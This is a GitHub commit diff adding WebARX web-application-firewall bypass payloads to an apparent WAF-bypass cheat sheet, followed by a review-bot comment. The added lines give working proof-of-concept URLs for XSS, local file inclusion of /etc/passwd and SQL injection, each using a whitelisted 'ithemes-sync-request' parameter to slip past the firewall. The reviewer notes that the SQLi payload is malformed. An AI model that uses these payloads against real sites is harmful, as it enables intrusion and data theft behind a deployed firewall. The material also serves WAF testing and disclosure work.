Update for more WebARX Bypasses

Pinaki Mondal 2019-10-13 22:54:13 +05:30 committed by GitHub
commit 1d0dd372e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -3722,6 +3722,20 @@ http://host.com/test.asp?file=.%./bla.txt
```
<a69/onauxclick=open&#40&#41>rightclickhere
```
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
- XSS PoC
```
http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
```
- LFI PoC
```
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
```
- SQLi PoC
```
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
```
### WebKnight
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
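Review bot: In the SQLi PoC, `unionselect` is written with no `%20` between the two keywords, so the query as shown is not valid SQL. If the entry's point is that appending `ithemes-sync-request` makes obfuscation unnecessary, this should read `union%20select`; if the fused form is deliberate, say so. The new entry also never states that the trailing `&ithemes-sync-request` parameter is the whitelist string named in the title, and gives no affected WebARX version. A one-line description under the link covering both would let readers see what the three PoCs have in common and check their own deployment against a fixed release. Finally, the `XSS PoC`, `LFI PoC` and `SQLi PoC` items sit at the same list level as the parent link; indenting them and their fences under it would match how they are meant to read.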